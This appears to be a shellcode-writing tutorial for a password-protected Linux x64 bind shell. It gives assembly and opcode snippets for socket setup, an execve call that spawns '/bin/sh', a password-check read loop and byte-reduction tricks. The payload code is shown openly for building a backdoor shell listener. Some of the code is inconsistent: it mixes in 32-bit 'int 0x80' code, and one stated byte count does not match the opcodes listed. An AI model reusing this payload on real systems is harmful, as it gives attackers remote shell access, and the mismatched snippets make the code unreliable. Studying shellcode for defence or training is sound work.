Our goal is to write shellcode for the Linux x64 architecture that will open a TCP over IPv4 socket, wait for an incoming connection and execute a shell only after the client provides a valid password.
In order to write a regular bind shell, we need to chain several syscalls. The exact order is the following (we’ll take care of the authentication later):
- We create a new socket and bind it to the target address using the socket and bind syscalls.
- We make the socket stay open and wait for a connection using the listen syscall.
- Once an incoming connection is received, we use the accept syscall to establish the connection.
- We duplicate each standard stream into the new connection stream using the dup2 syscall, so the target machine can read and write messages to and from the source machine.
- We fire a shell by using the execve syscall.
Each of these syscalls has a signature we need to address. Certain registers must contain specific values. For example, the rax register is used to identify the syscall that is executed so it should always contain the syscall number. A whole document containing a full syscall table can be found here.
Stage One: Writing a Syscall
Let’s see an example of how to execute a syscall
A Simple Syscall: Socket (0x29)
48c7c029000000 mov rax, 0x29 ; this is the socket syscall number 48c7c702000000 mov rdi, 0x02 ; 0x02 correponds with IPv4 4831f6 xor rsi, rsi 48ffc6 inc rsi ; 0x01 correponds with TCP 31d2 xor edx, edx ; 0 corresponds with protocol sub-family 0f05 syscall ; executes the syscall
Now, this code has some issue. First of all, it’s remarkably long (48 bytes to be precise). Second, it contains a lot of null bytes. Let’s try to fix that!
A More Realistic Approach: Socket (0x29)
The following implementation is 12 bytes long (a quarter of the last example) and contains no null bytes:
6a29 push 0x29 58 pop rax ; sets rax to 0x29 without nullbytes 6a02 push 0x02 5f pop rdi ; same technique for rdi 6a01 push 0x01 5e pop rsi ; same for rsi 99 cdq ; setting rdx to 0 using just one byte 0f05 syscall
Stage Two: Writing a Bind Shell
section .text global _start _start: ;execve(argv, argv, NULL); xor ecx, ecx mul ecx push ecx push 0x68732f2f # reverse /sh i.e., hs/ hex value is 68732f2f push 0x6e69622f # similar to above mov ebx, esp mov al, 11 int 0x80
Armed with all our knowledge we now need to chain every syscall together.
We can check the bind shell is working by assembling and linking the file, then extracting the shellcode and running it.
After having run our shellcode we should then connect from another terminal using netcat issuing the following command and a shell should popup:
nc 127.0.0.1 4444
Stage Three: Adding Authentication
In order to add authentication, we need to read from the client file descriptor and compare the input against a password before executing the shell. The code should look roughly like this:
; 6 - Handle incoming connection; 6.1 - Save client fd and close parent fd mov r9, rax ; store the client socket fd into r9 ; this is not mandatory, may be commented out to save some space push syscalls.close pop rax ; close parent syscall; 6.2 - Read password from the client fd read_pass: mov rax, r14 ; read syscall == 0x00 mov rdi, r9 ; from client fd push 4 pop rdx ; rdx = input size sub rsp, rdx mov rsi, rsp ; rsi => buffer syscall; 6.3 - Check password mov rax, config.password mov rdi, rsi scasq jne read_pass
Basically, we read from the client file descriptor, then compare the input against a given password and repeat the process until it succeeds.
Stage Four: Reducing the Payload
While working on the initial implementation null-bytes were avoided but we did not care much about size until this point. The payload will be now around 180 bytes in size. In order to remove null-bytes and reduce instruction size, we can use radare2 rasm2 utility to compare instructions output.
Here’s a simple case:
rasm2 -a x86 -b 64 "mov rax,29" 48c7c01d000000 rasm2 -a x86 -b 64 “mov al,29” b01d
We replaced some of the constants into the code in order to find possible arithmetic instructions to replace the constants with. Used xchg instead of mov reg, reg when conditions allowed it.
we also used some x64 registers as constant holders for values that were used repeatedly or were problematic (like 0x00 and 0x10) so we could load values without having to push them on the stack or make any other arithmetic instruction first, thus saving some bytes.
Another trick was to use smaller register sizes when the situation allowed it (like r14d, r14w or r14b instead of the whole r14).
The last version should be around 163 bytes long.